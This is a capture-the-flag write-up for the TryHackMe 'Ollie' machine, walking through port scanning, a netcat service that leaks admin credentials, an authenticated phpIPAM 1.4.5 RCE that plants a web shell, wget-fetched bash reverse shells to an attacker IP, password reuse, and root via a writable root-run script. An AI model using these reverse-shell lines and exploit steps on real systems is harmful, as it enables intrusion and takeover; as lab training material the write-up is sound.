# Ollie - THM

```bash
nmap -sC -sV -oN nmap.initial 10.10.152.198
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-26 01:36 EDT
Nmap scan report for 10.10.152.198
Host is up (0.076s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b71ba8f88c8a4a5355c02e8901f25669 (RSA)
|   256 4e2743b6f454f918d038dacd769b8548 (ECDSA)
|_  256 1482cabb04e501839cd654e9d1fac482 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Ollie :: login
|_Requested resource was http://10.10.152.198/index.php?page=login
| http-robots.txt: 2 disallowed entries 
|_/ /immaolllieeboyyy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Launch nmap scan on all ports, and discovered `1337`

```
PORT     STATE SERVICE                                           
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
```

## Discovered port 1337

Using netcat to connect to port 1337

```bash
nc 10.10.152.198 1337                      
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.

What is your name? hackerz
What's up, Hackerz! It's been a while. What are you here for? password
Ya' know what? Hackerz. If you can answer a question about me, I might have something for you.


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.

                    Username: admin

                    Password: OllieUnixMontgomery!

PS: Good luck and next time bring some treats!
```

Yeah, got admin password

| Service | User | Password | 
| ------- | ---- | -------- |
| PHPIpam | admin | OllieUnixMontgomery! |


## Exploit PHPIpam 

I saw on the login screen that is PHPIpam v1.4.5

Looking for exploit :

```bash
$ searchsploit phpipam 1.4.5
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
```

Let's download and execute this exploit :

```bash
python3 exploit.py -url http://10.10.8.226 -usr admin -pwd OllieUnixMontgomery! -cmd id

█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█   ▄█ ░ █░█ ░ █▀   █▀ █▀█ █░░ █   ▀█▀ █▀█   █▀█ █▀▀ █▀▀
█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█   ░█ ▄ ▀▀█ ▄ ▄█   ▄█ ▀▀█ █▄▄ █   ░█░ █▄█   █▀▄ █▄▄ ██▄

█▄▄ █▄█   █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀
█▄█ ░█░   █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄

[...] Trying to log in as admin
[+] Login successful!
[...] Exploiting
[+] Success! The shell is located at http://10.10.8.226/evil.php. Parameter: cmd


[+] Output:
1        uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Yeah, we got RCE ! On my way to reverse shell

Let's create a bash reverse shell :

```bash
#!/bin/bash
sh -i >& /dev/tcp/10.8.17.62/9001 0>&1
```

then, upload this one to the victim. From a web browser, call this url, to execute a `wget` command to download our revserse shell in a `/tmp` directory.

```
http://10.10.8.226/evil.php?cmd=wget${IFS}-O${IFS}/tmp/shell.sh${IFS}http://10.8.17.62:8000/shell.sh
```

This second URL to call is to execute the reverse shell. Make sur to launcha nc listener on port 9001 `nc -lvnp 9001`

```
http://10.10.8.226/evil.php?cmd=bash${IFS}/tmp/shell.sh
```

And yeah! we are in :

```bash
nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.8.17.62] from (UNKNOWN) [10.10.8.226] 56064
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

python3 -c 'import pty; pty.spawn("/bin/bash")'

## PrivEsc to Ollie user

First, i check to the `config.php` found db creds :

| user | password |
| ---- | -------- |
| phpipam_ollie | IamDah1337estHackerDog! |

But trying to connect with ollie user with this password didnt work. Tring the 1st password that i found and it's works. Im ollie !

```bash
www-data@hackerdog:/var/www/html$ su - ollie
su - ollie
Password: OllieUnixMontgomery!

ollie@hackerdog:~$ id
id
uid=1000(ollie) gid=1000(ollie) groups=1000(ollie),4(adm),24(cdrom),30(dip),46(plugdev)
```

## PrivEsc to Root

Running Linpeas but i found nothing... So i running `pspy64` and i see that binary was executed with root ID :

```bash
/bin/bash /usr/bin/feedme
```

Let's see !

```bash
$ ls -la /usr/bin/feedme
-rwxrw-r-- 1 root ollie 30 Feb 12  2022 /usr/bin/feedme
$ cat /usr/bin/feedme

#!/bin/bash

# This is weird?
```

Okay so we can edit this file ! Let's do this to pop a shell as Root !

```bash
echo "sh -i >& /dev/tcp/10.8.17.62/9002 0>&1" >> /usr/bin/feedme
```

Then start listener, wait a bit...And we are rooooot :D

```bash
nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.8.17.62] from (UNKNOWN) [10.10.47.145] 35086
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```
